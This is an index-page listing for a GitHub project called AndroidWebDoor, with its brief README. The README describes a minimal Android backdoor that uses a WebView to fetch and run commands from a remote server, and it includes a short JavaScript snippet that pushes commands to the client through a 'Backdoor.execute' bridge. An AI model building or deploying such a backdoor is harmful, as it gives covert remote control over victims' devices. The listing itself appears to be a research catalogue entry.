Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/Ch0pin/AndroidWebDoor

A minimalistic android backdoor
https://github.com/Ch0pin/AndroidWebDoor

Last synced: about 1 month ago
JSON representation

A minimalistic android backdoor

Awesome Lists containing this project

README

        

# AndroidWebDoor

For research purposes only !!

Minimalistic Android Backdoor based on a single webview which fetches and executes commands from a remoter server.
From Server's side, simply add javascript code that sends the command to the client:

function execCmd(cmd) {
Backdoor.execute(cmd);
}

TODO: Implement the server side code in python.